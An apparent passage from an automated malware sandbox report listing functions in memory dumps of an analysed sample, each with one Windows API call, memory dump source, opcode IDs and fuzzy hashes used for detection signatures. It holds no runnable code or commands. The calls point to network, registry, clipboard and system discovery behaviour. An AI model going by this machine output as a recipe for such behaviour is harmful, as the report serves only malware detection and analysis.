Function 0168AFD4, Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,E45E8E44,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 0168B040

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0dd4e0c59db3bceaf07c54d69bd556e02ad5d5815a125a1bb693048d4d8380a0
Instruction ID: adba06fbfc46c0135a881f3724259ac1d0ade8c846eed52474bb3553f6401647
Opcode Fuzzy Hash: 0dd4e0c59db3bceaf07c54d69bd556e02ad5d5815a125a1bb693048d4d8380a0
Instruction Fuzzy Hash: FA21C3725093C05FDB038F25DC54A92BFB4AF47324F0980DAED858F263D2759908DB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F927DE, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

MapViewOfFile.KERNEL32 ref: 05F92852

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: FileView
String ID:
API String ID: 3314676101-0
Opcode ID: e1358ac933f58271d6c2aad2a16f0a7b78824586c773115bb2c7bcc7853a39c6
Instruction ID: 4ee1bce084e5e9d54beae0dc747680d85f072ee74386711d99077932d5eea248
Opcode Fuzzy Hash: e1358ac933f58271d6c2aad2a16f0a7b78824586c773115bb2c7bcc7853a39c6
Instruction Fuzzy Hash: 0A21AE71500600EFEB25CF15DC45FA6FBE8EF08320F14845AEA889B251D775A508CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F921D6, Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON

Download Yara Rule

APIs

WSASocketW.WS2_32 ref: 05F92242

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: b70384194f22e5f14af2f05fe96e1729ad6248d97f549ae98190482d68543f4b
Instruction ID: 5b6d8208ace76c4def4b5db825e3c5c82ce4cb547841ee34e5f151fc0eea5a4e
Opcode Fuzzy Hash: b70384194f22e5f14af2f05fe96e1729ad6248d97f549ae98190482d68543f4b
Instruction Fuzzy Hash: 6A21BB71500600AFFB21CF65DC84F66FBA8EF08320F14856AEA858A251D375A408CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0168B58A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 0168B5EE

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: fdcbdb51375f885cdcdc65fee55482d319a9026784b1979d521bc7e2e5b63edf
Instruction ID: 257194d742e87d0a358c25804cb09fd71f3786880d359680ec5158c1dd7c39d1
Opcode Fuzzy Hash: fdcbdb51375f885cdcdc65fee55482d319a9026784b1979d521bc7e2e5b63edf
Instruction Fuzzy Hash: E111B171500200AFEB21DF29DC84F6BBBA8EF45314F14856BEE05DB251D670E849CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F937E2, Relevance: 1.6, APIs: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNELBASE(?,00000E2C), ref: 05F93845

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: 55c148396a7d715a20a8bc26ec75c48268df6c0989f41132490700af6e4d91ad
Instruction ID: c6529e36097eaa56f922f11cab50d8ef8ad1bac1cb8002e03294de116b1f3223
Opcode Fuzzy Hash: 55c148396a7d715a20a8bc26ec75c48268df6c0989f41132490700af6e4d91ad
Instruction Fuzzy Hash: F2119372900604AFFB10DF15DC45FBBFB9CEF44720F14886BEE449B281D678A5058AB5

Uniqueness

Uniqueness Score: -1.00%

Function 0168AC3B, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNEL32(?,E45E8E44,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 0168ACA8

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 0fd25719f0a7ec825ed4a34d242c5e91150dfa20a2f53e9c8633a9d628d8b468
Instruction ID: 5e396f4619aa559bd7ac0abdb871d966f916ab89d6956291c94c06794267ac49
Opcode Fuzzy Hash: 0fd25719f0a7ec825ed4a34d242c5e91150dfa20a2f53e9c8633a9d628d8b468
Instruction Fuzzy Hash: 7221AE7140A3C09FDB138B25DC51692BFB4EF07220F0984EBDD858F263D2649948CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F939E6, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F93A50

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: ChangeNotifyValue
String ID:
API String ID: 3933585183-0
Opcode ID: 4ece439cd5624ac8d9abe5fa9557568dd78f389e4b8fe7d1187db5608829130f
Instruction ID: f5061bb0434663500e1ece21fe9e1400523ae29db3a8d0e3d4b4c8ba03917e83
Opcode Fuzzy Hash: 4ece439cd5624ac8d9abe5fa9557568dd78f389e4b8fe7d1187db5608829130f
Instruction Fuzzy Hash: 9811B172400604AFEB21CF55DC84FA7FBACEF44710F14886BEA459B241D674A508CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 05F91169, Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 05F911E5

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 788ae29682f3c525f8671e448aa9d3f1d0ec8f4e85588d21cdb316f0a9429a4d
Instruction ID: 11c52eb53f2beac3e7ce7dffc7a7c705bbf915a69019083b34866681df1739ed
Opcode Fuzzy Hash: 788ae29682f3c525f8671e448aa9d3f1d0ec8f4e85588d21cdb316f0a9429a4d
Instruction Fuzzy Hash: 4B219075509784AFEB228F25DC44B62FFE8EF06214F08809AED85CB253D265E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F92442, Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F924B4

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 9a74eeb24f13dbb65c737184a0aac1bfa03afaffb447bf8deed1154eb0a34be1
Instruction ID: aeaf8b3786fa0bcc49ef89d2ef2f928a1c635605ea8038f16801754d121b483a
Opcode Fuzzy Hash: 9a74eeb24f13dbb65c737184a0aac1bfa03afaffb447bf8deed1154eb0a34be1
Instruction Fuzzy Hash: DF1181B6500604AFEB21CF59DC41F67FBECEF08720F14846AEE459B252D664E408CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0168AAFB, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000E2C,?,?), ref: 0168AB7E

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 0cf7131d95531119e99451b79d027345a671071fe7ac88cd292a9438870337b6
Instruction ID: 4bb9c95df9d9e53beb30a8ca90b29b7b470712910e1732c35d5db9d971858024
Opcode Fuzzy Hash: 0cf7131d95531119e99451b79d027345a671071fe7ac88cd292a9438870337b6
Instruction Fuzzy Hash: 1E21D5725093806FC312CB25CC41F22FFB4EF86610F0981DBE8848B253D220A915CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05F92C5A, Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F92CB9

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 7c3e89966e073a38e0a08bcf2243cfadd5ad5281cab56a6dfca9549a1be68c96
Instruction ID: c8c8cf8edb2f30c118653baad0a4cec543b4ec5c3cb534a81e38bf0aa1f9ca87
Opcode Fuzzy Hash: 7c3e89966e073a38e0a08bcf2243cfadd5ad5281cab56a6dfca9549a1be68c96
Instruction Fuzzy Hash: 4711E272500600AFEB21DF65DC44FABFBA8EF48320F14846BEE459B251D674A408CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 05F9337E, Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON

Download Yara Rule

APIs

WSAEventSelect.WS2_32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F933E2

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: EventSelect
String ID:
API String ID: 31538577-0
Opcode ID: 00d5257b1726db2eb2b92366e70737f45dd41ed36090ea3e119c6bcb07a91449
Instruction ID: dd797735a6498942b9d2a8d5e5d3f7e6b3c3dd6e5bc3c0bea3d6d5549b80871f
Opcode Fuzzy Hash: 00d5257b1726db2eb2b92366e70737f45dd41ed36090ea3e119c6bcb07a91449
Instruction Fuzzy Hash: 5E118672500604AFEB21DF59DC45FABFBACEF45310F14886BEE459B241D674A504CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F94AC2, Relevance: 1.6, APIs: 1, Instructions: 63encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F94B1E

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: 051a1953a5baf49e68e12da74c113105587a2b318661189870cd9420d305650b
Instruction ID: fd140f521a2294e2ac47d2158a657c3a8d7abfedc60801f1d3741755d6ce785b
Opcode Fuzzy Hash: 051a1953a5baf49e68e12da74c113105587a2b318661189870cd9420d305650b
Instruction Fuzzy Hash: 4F11B271900604AFEF21CF25DC85F67FBA8EF45720F14846BEE459B241D675A805CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0168B4A2, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 0168B4FE

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 0fb353d9bf7537e9ad9a9ef683439a305c3d927ba4191c2ad1d5d3d9f33e9464
Instruction ID: 29cb72b5d53182633a66c31ba9c0ae3823ec930cf6b68b009e1bd9b3097d6513
Opcode Fuzzy Hash: 0fb353d9bf7537e9ad9a9ef683439a305c3d927ba4191c2ad1d5d3d9f33e9464
Instruction Fuzzy Hash: 3E11C471500200AFEB21DF69DC45F67FFA8EF45320F14856BEE459B251D674A405CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0168A836, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,E45E8E44,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 0168A8A8

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1faf2035b5874356b89d28bdd929ea98b1bf7c24edf72efc2b3d3ed3ee893452
Instruction ID: 7de5f045a9adb834cf59d727df294cd8605772d4661c24a9306c3d8c8c9d1da4
Opcode Fuzzy Hash: 1faf2035b5874356b89d28bdd929ea98b1bf7c24edf72efc2b3d3ed3ee893452
Instruction Fuzzy Hash: 8C218C7140E3C4AFD7138B258C54662BFB4DF07224F0980DBDD858F2A3D2695908DB72

Uniqueness

Uniqueness Score: -1.00%

Function 0168A78B, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0168A7F6

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 18cf21e6f0f05cc43b443e944630b88817a4885c6ca3735844d3f09b6114e8ae
Instruction ID: 2563b4e9212339fb52cfa9b50cbc67b79954a207220a73e993b240f33ac84b89
Opcode Fuzzy Hash: 18cf21e6f0f05cc43b443e944630b88817a4885c6ca3735844d3f09b6114e8ae
Instruction Fuzzy Hash: D2117271409380AFDB228F55DC44A62FFF4EF4A210F08859AEE858B262D275A919DB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F91E7E, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

setsockopt.WS2_32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F91EDD

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: setsockopt
String ID:
API String ID: 3981526788-0
Opcode ID: b83b438ff1e918569529a29a38bfbbf47d2724fc13f2ce26f46411af08661848
Instruction ID: f4e4a235e847459b386ead4b480d8438a7636f18af6011db1bd2af2a5606dfae
Opcode Fuzzy Hash: b83b438ff1e918569529a29a38bfbbf47d2724fc13f2ce26f46411af08661848
Instruction Fuzzy Hash: E811BF72400604EFEB21DF55DC40F6AFBA8EF49324F14846BEE499B251C274A408CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0168B93A, Relevance: 1.6, APIs: 1, Instructions: 60comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?,00000E2C,?,?), ref: 0168B9B2

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 2b8d5339ae0f40637b060b8ead75b2fc81482df840009fdb50ee48357b07193a
Instruction ID: df09b0da3b1454f554a4c7f7c133e1e9ebe82435f3e1de0984b2b69812da451b
Opcode Fuzzy Hash: 2b8d5339ae0f40637b060b8ead75b2fc81482df840009fdb50ee48357b07193a
Instruction Fuzzy Hash: A111C4715093806FD311CB25CC45F66FFB8EF8A620F19819FED484B692D225B915CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 05F94BAA, Relevance: 1.6, APIs: 1, Instructions: 59encryptionCOMMON

Download Yara Rule

APIs

CertVerifyCertificateChainPolicy.CRYPT32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F94C06

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: CertCertificateChainPolicyVerify
String ID:
API String ID: 3930008701-0
Opcode ID: c5af31fbe2eadc869a9f040daacfdebf9f220cba2eed05f266550e8fc3a997a1
Instruction ID: 8b44c086ddd6a7f3244143f7d2f0202da173846875814be09bbf2a6691e482db
Opcode Fuzzy Hash: c5af31fbe2eadc869a9f040daacfdebf9f220cba2eed05f266550e8fc3a997a1
Instruction Fuzzy Hash: 3311BC72500700AFEB21DF25DD84F66FBA8EF54324F14846BEE489B241D274A4098BB1

Uniqueness

Uniqueness Score: -1.00%

Function 05F930C2, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F9311B

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: 815bdadc3fcea292efd6ae7bfc326bbd8be291d90d9bd0be9ea61a16b522da07
Instruction ID: 8ff5418cd6b61f41d03f10583ba4179b51955067a8e8da96c2171f5d441a68d0
Opcode Fuzzy Hash: 815bdadc3fcea292efd6ae7bfc326bbd8be291d90d9bd0be9ea61a16b522da07
Instruction Fuzzy Hash: 4C11E072800604AFEB21CF55DC85FA6FBA8EF44320F14886BEE089B291D275A444CB71

Uniqueness

Uniqueness Score: -1.00%

Function 05F92B8A, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

shutdown.WS2_32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F92BE0

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: shutdown
String ID:
API String ID: 2510479042-0
Opcode ID: 74a498215ce6e440dedc6ea5a589a49aa604936dd9acde7d8b50217791deeca6
Instruction ID: 396083d8bc46cbf6e8150468f819b4e871cb8eeec36a761f9d161a50b6545d0d
Opcode Fuzzy Hash: 74a498215ce6e440dedc6ea5a589a49aa604936dd9acde7d8b50217791deeca6
Instruction Fuzzy Hash: D111C271500604BFEB11DF15DC85FA6FB9CEF45320F1484A7EE089B241D678A545CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 05F90522, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000E2C), ref: 05F9058B

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 038e49d0c343e0f5bb7589dac8db38f3c7b28aa2bdc5a174ea4bd8c957f753f1
Instruction ID: d29d5a9f56e072f9b51ba3433020fa06f1c3e8964701bc466a3fe716a0826604
Opcode Fuzzy Hash: 038e49d0c343e0f5bb7589dac8db38f3c7b28aa2bdc5a174ea4bd8c957f753f1
Instruction Fuzzy Hash: 1D11CE71500700EFFB20DB15DC85FB6FBACEF05720F54809AEE449B281D6A8A508CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 05F93462, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetAdaptersAddresses.IPHLPAPI(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F934C1

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: AdaptersAddresses
String ID:
API String ID: 2506852604-0
Opcode ID: 6dd20bd3673b11d56b3abb4d55787c5ea25e39ea0c502eb263ebaedbe544335b
Instruction ID: 640ab8cce1076a6f6315536513ffce3f4a5a58b3a925462b623353a694cabf40
Opcode Fuzzy Hash: 6dd20bd3673b11d56b3abb4d55787c5ea25e39ea0c502eb263ebaedbe544335b
Instruction Fuzzy Hash: 36110272500600EFEB218F19CC41F6BFFA8EF04320F14885BEE455B291C278A408CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 05F91A04, Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,E45E8E44,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 05F91A58

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 7251cfa94c012277e8ec4d1e0e849ef52315b73b7649d56a49133ff114f8d44f
Instruction ID: 38058ed3f48a8d79cc4a88f38d8918b089de8378929c9c2154e487c49ea21a84
Opcode Fuzzy Hash: 7251cfa94c012277e8ec4d1e0e849ef52315b73b7649d56a49133ff114f8d44f
Instruction Fuzzy Hash: 9F11A771509384AFDB128F25DC44B52BFA4DF46220F0884EBED85CF652D2759948CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05F93716, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RasConnectionNotificationW.RASAPI32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F9376F

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: ConnectionNotification
String ID:
API String ID: 1402429939-0
Opcode ID: de76d186b8c7c7d3a428a75fdd8615aa6837620c9efe2b309bae2a9d6db47b32
Instruction ID: cd50ee5f139bdc5720672f8f88132d1ab3f9a693c5a12478bec174ca16be5d36
Opcode Fuzzy Hash: de76d186b8c7c7d3a428a75fdd8615aa6837620c9efe2b309bae2a9d6db47b32
Instruction Fuzzy Hash: 5111E1B5904604AFEB208F15CC84F66FBA8EF05320F14886BEE459B281D274A408CB72

Uniqueness

Uniqueness Score: -1.00%

Function 0168A078, Relevance: 1.6, APIs: 1, Instructions: 54networkCOMMON

Download Yara Rule

APIs

send.WS2_32(?,?,?,?), ref: 0168A0D5

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: send
String ID:
API String ID: 2809346765-0
Opcode ID: 5fe578fb3fc7db162b67e211a416186516b9bd2a26ae47a61f53b122ee3c79e3
Instruction ID: 3c5a9c9af2e457b39e816553f92e5a81db137460070ae8bfefb59b1bab4734ed
Opcode Fuzzy Hash: 5fe578fb3fc7db162b67e211a416186516b9bd2a26ae47a61f53b122ee3c79e3
Instruction Fuzzy Hash: 72118F71409380AFDB22CF55DC44B52FFB4EF4A224F08849BED888B652D275A918DB61

Uniqueness

Uniqueness Score: -1.00%

Function 05F91FFE, Relevance: 1.6, APIs: 1, Instructions: 53networkCOMMON

Download Yara Rule

APIs

GetNetworkParams.IPHLPAPI(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F92054

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: NetworkParams
String ID:
API String ID: 2134775280-0
Opcode ID: 19aae417c708f3aac3def2d4792863514f23a7a2b525fb2ab587cd2105d841d2
Instruction ID: a4a737f38078bead4b0af34e121131d83056e984c220c531bb7c31d28c6928c6
Opcode Fuzzy Hash: 19aae417c708f3aac3def2d4792863514f23a7a2b525fb2ab587cd2105d841d2
Instruction Fuzzy Hash: 5F010075900604BEEB20CF15DC81F67FFA8EF05720F1480ABEE499B251D2B9A408CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0168AD22, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0168AD6A

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: f558a298eb0b755a05e1d5a8a9f47e8e436c99222caba46f579225f62c31d591
Instruction ID: a87d8890b60f1ec733e42d4e41add0f28c900f940d150389029f6be5918fd5bb
Opcode Fuzzy Hash: f558a298eb0b755a05e1d5a8a9f47e8e436c99222caba46f579225f62c31d591
Instruction Fuzzy Hash: 90117CB2A002009FEB61DF69DC84756FBE8EB44221F08856BDE49DB342D674E404CA61

Uniqueness

Uniqueness Score: -1.00%

Function 05F91CEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000E2C,E45E8E44,00000000,00000000,00000000,00000000), ref: 05F91D41

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: e4f19146c4320ec6cc0cdf0bf7e1d2e918fb4d985de896358141a76d38864a06
Instruction ID: 73fdc0d131fef4c49c1618205a98143de013d9703b3a1e7393c594d90ec09f99
Opcode Fuzzy Hash: e4f19146c4320ec6cc0cdf0bf7e1d2e918fb4d985de896358141a76d38864a06
Instruction Fuzzy Hash: 1801D271900A04AEEB20CB15DC85F67FBACEF45720F1480A7EE449B245D6B8A408CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 05F90F66, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

GetClassInfoW.USER32 ref: 05F90FAE

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: ClassInfo
String ID:
API String ID: 3534257612-0
Opcode ID: 5668d0dbf7f6cd3d514e217effa08498a1aff3a2d8d88feaa22cbab256cc6076
Instruction ID: 373eacd0440b8a0dad089d72da5c532e78f67fb5ef656b65cc83b43372c789ba
Opcode Fuzzy Hash: 5668d0dbf7f6cd3d514e217effa08498a1aff3a2d8d88feaa22cbab256cc6076
Instruction Fuzzy Hash: 95018475A006049FEB54CF19D888B66FBDCEF04714F18C0AADD498B651E774E608CB72

Uniqueness

Uniqueness Score: -1.00%

Function 05F93536, Relevance: 1.5, APIs: 1, Instructions: 49networkCOMMON

Download Yara Rule

APIs

WSAConnect.WS2_32(?,?,?,?,?,?,?), ref: 05F93582

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: Connect
String ID:
API String ID: 3144859779-0
Opcode ID: 5035e9fd94490ec9431013e414c7cba19f460ea4a7b0845e833250e78781523c
Instruction ID: 3db79815f8af4585ef3112ad20032e3e04454a0a50742e2ffdf9f0f4db732a47
Opcode Fuzzy Hash: 5035e9fd94490ec9431013e414c7cba19f460ea4a7b0845e833250e78781523c
Instruction Fuzzy Hash: 61115A71900A049FEB21CF55D844B66FBE5EF08211F08C9AAEE498B662D375E418DF62

Uniqueness

Uniqueness Score: -1.00%

Function 05F932D6, Relevance: 1.5, APIs: 1, Instructions: 47encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateChain.CRYPT32(?,00000E2C,?,?), ref: 05F93326

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: 41c74a63e0a623d83e06b2cdb02eabf2eadc8042c2454bf8cc419d01784ef7c5
Instruction ID: 9448a853c4c41e7229cbfb6f5f3517ab74863975d08df5c03ee1b695a8db9e1a
Opcode Fuzzy Hash: 41c74a63e0a623d83e06b2cdb02eabf2eadc8042c2454bf8cc419d01784ef7c5
Instruction Fuzzy Hash: E9017176900600ABD750DF16DC85F36FBA8EB88B20F14856AED089B741E731B915CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0168B6AA, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000E2C,?,?), ref: 0168B6FA

Memory Dump Source

Source File: 00000003.00000002.475974538.000000000168A000.00000040.00000001.sdmp, Offset: 0168A000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 8891e15a8c9ff39fd978be8094d67cb512842e0dba1b6b17366cfb033fba9899
Instruction ID: 44de996dd75990c61e626ab97e68a2f432db7063dfbcf912dffe35afb03e6c84
Opcode Fuzzy Hash: 8891e15a8c9ff39fd978be8094d67cb512842e0dba1b6b17366cfb033fba9899
Instruction Fuzzy Hash: AD017176900600ABD710DF16DC85F36FBA8EB88B20F14856AED089B741E731B915CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 05F9119A, Relevance: 1.5, APIs: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryShim.MSCOREE(?,?,?,?), ref: 05F911E5

Memory Dump Source

Source File: 00000003.00000002.481417853.0000000005F90000.00000040.00000001.sdmp, Offset: 05F90000, based on PE: false

Similarity

API ID: LibraryLoadShim
String ID:
API String ID: 1475914169-0
Opcode ID: 01e81bffee5d06b805e11290eb3dcfd03df0f773ef1bb33491eea48fcca5f7c7
Instruction ID: 4e70e95e4fce5db0173fbca957f9db46a518604062ae717fcea20a743f9fd177
Opcode Fuzzy Hash: 01e81bffee5d06b805e11290eb3dcfd03df0f773ef1bb33491eea48fcca5f7c7
Instruction Fuzzy Hash: CA018075900A059FEB20DF1AD844B62FBE8EF08620F08806ADD499B741D275E448CB71

Uniqueness

